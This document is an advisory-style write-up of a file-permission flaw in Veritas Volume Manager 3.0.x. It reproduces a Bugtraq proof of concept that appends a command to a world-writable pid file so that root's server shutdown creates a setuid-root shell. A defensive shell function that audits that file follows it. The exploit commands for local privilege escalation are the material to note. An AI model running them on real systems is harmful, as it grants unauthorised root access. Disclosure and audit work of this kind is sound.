Veritas Volume Manager 3.0.x File Permission Vulnerability
From the example posted to Bugtraq:

# append our malicious commands to the world-writeable file
foo@bar> id
uid=500(foo) gid=25(programmers)
foo@bar> ls -alt /var/opt/vmsa/logs/.server_pids
-rw-rw-rw- 1 root root 27 Jun 8 16:06 /var/opt/vmsa/logs/.server_pids
foo@bar> cat >> /var/opt/vmsa/logs/.server_pids
cp /bin/ksh /var/tmp; chmod 4755 /var/tmp/ksh
^D
foo@bar> cat /var/opt/vmsa/logs/.server_pids
kill 328
kill 329
kill 337
cp /bin/ksh /var/tmp; chmod 4755 /var/tmp/ksh
foo@bar>

# wait for root to stop the server manually
root@bar> /opt/VRTSvmsa/bin/vmsa_server -k
Stopping VERITAS VM Storage Administrator Server
root@bar> ls -alt /var/tmp
total 406
drwxrwxrwt 2 sys sys 512 Jun 8 17:46 .
-rwsr-xr-x 1 root other 192764 Jun 8 17:46 ksh
-rw------- 1 root root 387 Jun 8 17:46 wsconAAArqayVa:0.0
drwxr-xr-x 26 root sys 512 Jun 8 09:51 ..

# as an unprivileged user, run the suid-root shell we just created...
foo@bar> /var/tmp/ksh
# id
uid=500(foo) gid=25(programmers) euid=0(root)
#
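A defender-side audit for the condition in the listing above, added here as an example and not taken from the Bugtraq post or from Veritas code. The function name audit_pidfile is hypothetical, and the check assumes that a legitimate .server_pids file holds only "kill <pid>" lines, as the listing shows, and is owned by root (uid 0) unless another uid is passed.

```shell
#!/bin/sh
# Added example: audit a pid file that a root stop routine will execute.
# Assumption: legitimate content is only lines of the form "kill <pid>".
# OWNER_UID defaults to 0 (root); pass another uid to audit a test copy.

# audit_pidfile FILE [OWNER_UID]
# Prints one finding per problem; returns 0 if clean, 1 otherwise.
audit_pidfile() {
    f=$1
    owner=${2:-0}
    rc=0

    # A symlink or non-regular file could redirect the reader elsewhere.
    if [ -L "$f" ] || [ ! -f "$f" ]; then
        echo "FINDING: $f is not a regular file"
        return 1
    fi

    # Anyone with write access can append commands (the -rw-rw-rw- case).
    if [ -n "$(find "$f" -prune \( -perm -020 -o -perm -002 \) -print)" ]; then
        echo "FINDING: $f is group- or world-writable"
        rc=1
    fi

    if [ -z "$(find "$f" -prune -user "$owner" -print)" ]; then
        echo "FINDING: $f is not owned by uid $owner"
        rc=1
    fi

    # Flag every line that is not exactly "kill <digits>".
    bad=$(grep -nEv '^kill [0-9]+$' "$f" || true)
    if [ -n "$bad" ]; then
        echo "FINDING: unexpected lines in $f:"
        echo "$bad" | sed 's/^/    /'
        rc=1
    fi

    return $rc
}
```

Run it as `audit_pidfile /var/opt/vmsa/logs/.server_pids` before stopping the server; any finding means the file should be inspected and its mode corrected before root executes it.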